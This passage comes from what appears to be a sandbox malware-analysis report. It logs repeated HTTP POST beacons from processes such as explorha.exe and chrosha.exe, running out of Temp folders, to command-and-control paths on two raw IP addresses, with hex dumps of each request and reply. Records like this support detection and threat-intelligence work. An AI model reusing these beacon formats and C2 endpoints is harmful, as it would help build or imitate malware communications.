                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:30.128458977 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:29 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      332192.168.2.550175193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:30.031157970 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:30.284478903 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:30 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      333192.168.2.550176193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:30.382853031 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:30.635801077 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:30 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      334192.168.2.550177193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:30.648199081 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:30.895912886 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:30 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      335192.168.2.550178193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:30.997479916 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:31.245719910 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:31 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      336192.168.2.550179193.233.132.56808152C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:31.152559996 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:31.406743050 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:31 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      337192.168.2.550180193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:31.494344950 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:31.742284060 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:31 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      338192.168.2.550181193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:31.782877922 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:32.032886982 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:31 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      339192.168.2.550182193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:32.101059914 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:32.345674038 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:32 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      340192.168.2.550183193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:32.287570000 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:32.536350965 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:32 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      341192.168.2.550184193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:32.590403080 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:32.836543083 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:32 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      342192.168.2.550185193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:32.896861076 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:33.138853073 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:33 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      343192.168.2.550186193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:33.197447062 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:33.445358038 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:33 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      344192.168.2.550187193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:33.392600060 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:33.644563913 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:33 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      345192.168.2.550188193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:33.695312023 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:33.944595098 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:33 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      346192.168.2.550189193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:34.018827915 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:34.267389059 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:34 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      347192.168.2.550190193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:34.299438000 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:34.544715881 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:34 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      348192.168.2.550191193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
